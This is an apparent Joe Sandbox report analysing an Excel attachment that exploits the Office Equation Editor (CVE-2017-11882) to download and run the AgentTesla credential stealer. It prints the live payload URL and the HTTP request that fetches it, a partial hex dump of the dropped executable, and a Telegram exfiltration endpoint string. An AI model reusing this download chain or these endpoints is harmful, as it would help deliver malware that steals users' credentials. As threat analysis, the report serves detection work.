Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Catalog of our new order.xlsx

Overview

General Information

Sample Name:Catalog of our new order.xlsx
Analysis ID:321291
MD5:f19674cfbff25cbd3f128ffd8e78c5c4
SHA1:07bf03f3b749c3d7f93758068f5a26c520279388
SHA256:02781481c25663e541fd70525609f84129fb57cf044e57c3e3410972267acc30
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Drops PE files to the user root directory
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2300 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2480 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2824 cmdline: 'C:\Users\Public\vbc.exe' MD5: 020BC13012CE4DB6E204CB1ED174851E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: vbc.exe PID: 2824JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: EQNEDT32.EXE connecting to internetShow sources
        Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.158.231.122, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2480, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
        Sigma detected: File Dropped By EQNEDT32EXEShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2480, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe
        Sigma detected: Executables Started in Suspicious FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: Execution in Non-Executable FolderShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824
        Sigma detected: Suspicious Program Location Process StartsShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2480, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2824

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for URL or domainShow sources
        Source: http://192.158.231.122/light.exeAvira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted fileShow sources
        Source: Catalog of our new order.xlsxReversingLabs: Detection: 31%
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exeJoe Sandbox ML: detected
        Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

        Exploits:

        barindex
        Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.158.231.122:80
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.158.231.122:80
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 20 Nov 2020 12:02:01 GMTAccept-Ranges: bytesETag: "a0bb98f434bfd61:0"Server: Microsoft-IIS/10.0Date: Fri, 20 Nov 2020 18:32:05 GMTContent-Length: 618496Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a b0 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 09 00 00 06 00 00 00 00 00 00 4e 87 09 00 00 20 00 00 00 a0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 02 00 00 ac 54 0a 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 87 09 00 4b 00 00 00 00 a0 09 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 67 09 00 00 20 00 00 00 68 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 09 00 00 04 00 00 00 6a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 09 00 00 02 00 00 00 6e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 87 09 00 00 00 00 00 48 00 00 00 02 00 05 00 60 e7 08 00 a0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 70 75 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 19 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7
        Source: Joe Sandbox ViewASN Name: DC74-ASUS DC74-ASUS
        Source: global trafficHTTP traffic detected: GET /light.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.158.231.122Connection: Keep-Alive
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: unknownTCP traffic detected without corresponding DNS query: 192.158.231.122
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85EDDC46.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /light.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.158.231.122Connection: Keep-Alive
        Source: vbc.exe, 00000004.00000002.2362766983.0000000004B1F000.00000004.00000001.sdmpString found in binary or memory: http://ns.a88
        Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
        Source: vbc.exe, 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

        System Summary:

        barindex
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: protected documents theyaoww*~ 24 25 26 27 28 29 ~ 30 " " " 31 ' " 32 33 0 0 0 0 0 q 34
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exeJump to dropped file
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\Public\vbc.exeCode function: 4_2_013CF3A94_2_013CF3A9
        Source: C:\Users\Public\vbc.exeCode function: 4_2_013D00784_2_013D0078
        Source: Catalog of our new order.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: light[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.troj.expl.winXLSX@33204/6@0/1
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Catalog of our new order.xlsxJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE1D6.tmpJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Catalog of our new order.xlsxReversingLabs: Detection: 31%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: Catalog of our new order.xlsxInitial sample: OLE indicators vbamacros = False
        Source: Catalog of our new order.xlsxInitial sample: OLE indicators encrypted = True
        Source: initial sampleStatic PE information: section name: .text entropy: 7.86673164949
        Source: initial sampleStatic PE information: section name: .text entropy: 7.86673164949
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: Catalog of our new order.xlsxStream path 'EncryptedPackage' entropy: 7.9980445334 (max. 8.0)
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564Thread sleep time: -480000s >= -30000sJump to behavior
        Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: vbc.exe, 00000004.00000002.2357034607.00000000013E0000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior

        Stealing of Sensitive Information:

        barindex
        Yara detected AgentTeslaShow sources
        Source: Yara matchFile source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected AgentTeslaShow sources
        Source: Yara matchFile source: 00000004.00000002.2355807000.000000000061C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2362460442.0000000004454000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information11LSA SecretsSystem Information Discovery12SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing2Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Catalog of our new order.xlsx31%ReversingLabsDocument-Word.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\light[1].exe100%Joe Sandbox ML
        C:\Users\Public\vbc.exe100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://192.158.231.122/light.exe100%Avira URL Cloudmalware
        http://ns.a880%Avira URL Cloudsafe
        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
